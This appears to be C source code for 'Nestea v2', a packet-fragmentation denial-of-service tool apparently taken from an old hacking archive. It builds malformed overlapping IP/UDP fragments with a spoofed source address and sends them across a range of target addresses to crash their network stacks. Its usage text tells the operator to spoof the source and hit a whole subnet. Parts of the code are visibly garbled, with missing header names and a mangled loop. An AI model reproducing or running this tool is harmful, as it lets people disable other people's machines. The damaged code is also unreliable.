#include #include #include #include #include #include #include #include #include #include #include #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define MAGIC2 108 #define PADDING 256 /* datagram frame padding for first packet */ #define COUNT 500 /* we are overwriting a small number of bytes we shouldnt have access to in the kernel. to be safe, we should hit them till they die : > */ struct ipstuph { int p1; int p2; int p3; int p4; } startip, endip; void usage(u_char *); u_long name_resolve(u_char *); u_short in_cksum(u_short *, int); void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv) { int one = 1, count = 0, i, rip_sock, j, bequiet = 0; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; char hit_ip[18], dst_ip2[18]; struct in_addr addr; fprintf(stderr, "\nNestea v2 originally by: humble + ttol mods\n"); fprintf(stderr, "Color and Instructions was done by : ttol\n"); fprintf(stderr, "Note : ttol released Nestea v2. humble had nothing to do with \n it, don't nag him about it. -ttol@ttol.net\n\n"); if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 4) usage(argv[0]); if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } strcpy(dst_ip2,argv[3]); if(sscanf(argv[2],"%d.%d.%d.%d",&startip.p1,&startip.p2,&startip.p3, &startip.p4) != 4) { fprintf(stderr, "Error, arg2(startip) : Need an ip that contains 4 zones\n"); exit(1); } if (startip.p1 > 255) { fprintf(stderr, "Error : Zone 1 of start ip is incorrect \ (greater than 255)\n"); exit(1); } if (startip.p2 > 255) { fprintf(stderr, "Error : Zone 2 of start ip is incorrect \ (greater than 255)\n"); exit(1); } if (startip.p3 > 255) { fprintf(stderr, "Error : Zone 3 of start ip is incorrect \ (greater than 255)\n"); exit(1); } if (startip.p4 > 255) { fprintf(stderr, "Error : Zone 4 of start ip is incorret \ (greater than 255)\n"); exit(1); } if(sscanf(argv[3],"%d.%d.%d.%d",&endip.p1,&endip.p2,&endip.p3, &endip.p4) != 4) { fprintf(stderr, "Error, arg3(endip) : [[0;34mNeed an ip that \ contains 4 zones[[0m\n"); exit(1); } if (endip.p1 > 255) { fprintf(stderr, "Error : Zone 1 of end ip is incorrect \ (greater than 255)\n"); exit(1); } if (endip.p2 > 255) { fprintf(stderr, "Error : Zone 2 of end ip is incorrect \ (greater than 255)\n"); exit(1); } if (endip.p3 > 255) { fprintf(stderr, "Error : Zone 3 of end ip is incorrect (greater than 255)\n"); exit(1); } if (endip.p4 > 255) { fprintf(stderr, "Error : Zone 4 of end ip is incorrect (greater than 255)\n"); exit(1); } if (startip.p1 != endip.p1) { fprintf(stderr, "Error : Zone 1 of start ip and end ip is different\n"); exit(1); } if (startip.p2 != endip.p2) { fprintf(stderr, "Error : Zone 2 of start ip and end ip is different\n"); exit(1); } if (startip.p3 != endip.p3) { fprintf(stderr, "Error : Zone 3 of start ip and end ip is different\n"); exit(1); } while ((i = getopt_long(argc, argv, "s:t:n:q")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short)atoi(optarg); break; case 't': /* dest port (DNS, anyone?) */ dst_prt = (u_short)atoi(optarg); break; case 'n': /* number to send */ count = atoi(optarg); break; case 'q': /* quiet mode */ bequiet = 1; break; default : usage(argv[0]); break; /* NOTREACHED */ } } srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % 0xffff); if (!dst_prt) dst_prt = (random() % 0xffff); if (!count) count = COUNT; fprintf(stderr, "Death on flaxen wings (yet again):\n"); addr.s_addr = src_ip; fprintf(stderr, "From: %15s.%d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip; fprintf(stderr, " To: %15s - %s.%d\n", inet_ntoa(addr), dst_ip2, dst_prt); fprintf(stderr, " Amt: %5d\n", count); if (bequiet) fprintf(stderr, "[quiet mode] Each'.' represents a nuked ip. ["); for (j=startip.p4; j <= endip.p4; j++) { sprintf(hit_ip,"%d.%d.%d.%d",startip.p1,startip.p2,startip.p3,j); if (!(bequiet)) fprintf(stderr, "%s [ ", hit_ip); if (!(dst_ip = name_resolve(hit_ip))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } for (i = 0; i < count; i++) { send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); if (!(bequiet)) fprintf(stderr, "d00m "); usleep(500); } if (bequiet) fprintf(stderr, "."); else fprintf(stderr, "]\n"); } if (bequiet) fprintf(stderr, "]\n"); return (0); } void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt) { int i; u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ u_char byte; /* a byte */ struct sockaddr_in sin; /* socket protocol structure */ sin.sin_family = AF_INET; sin.sin_port = src_prt; sin.sin_addr.s_addr = dst_ip; packet = (u_char *)malloc(IPH + UDPH + PADDING+40); p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40); byte = 0x4F; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 44; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ for(i=0;ih_addr, (char *)&addr.s_addr, host_ent->h_length); } return (addr.s_addr); } void usage(u_char *name) { fprintf(stderr, "nestea2 source startIP endIP [-s src port] [-t dest port] [-n quantity] [-q]\n"); fprintf(stderr, "source : This is the source IP to nestea from, make it a spoof\n"); fprintf(stderr, "startIP : From which IP should we start from? (eg 153.35.85.1)\n"); fprintf(stderr, "endIP : From which IP should we end with? (eg 153.35.95.255)\n"); fprintf(stderr, "src port : This is the source port to spoof from (OPTIONAL)\n"); fprintf(stderr, "dest port: This is the destination port to nestea to (OPTIONAL)\n"); fprintf(stderr, "quantity : This is how many times to nestea the victim (perfered is 1000)\n"); fprintf(stderr, "-q : This is quiet mode so you don't see the d00m's\n\n"); fprintf(stderr, "Example : nestea2 127.0.0.1 153.35.85.1 153.35.85.255 -n 1000\n"); fprintf(stderr, "The above was to hit a whole Class C of 153.35.85 with the return \naddress from 127.0.0.1 doing it 1000 times\n"); fprintf(stderr, "Example2 : nestea2 153.35.85.32 153.35.85.32 153.85.35.32 -n 1000\n"); fprintf(stderr, "The above was to hit 153.35.85.32 with the source 153.35.85.32 \ndoing it 1000 times\n"); fprintf(stderr, "I perfer example2, probably because it is the lazy man's way out\n\n"); fprintf(stderr, " NOT TO BE DISTRIBUTED!\n"); exit(0); } /* www.hack.co.za [2000]*/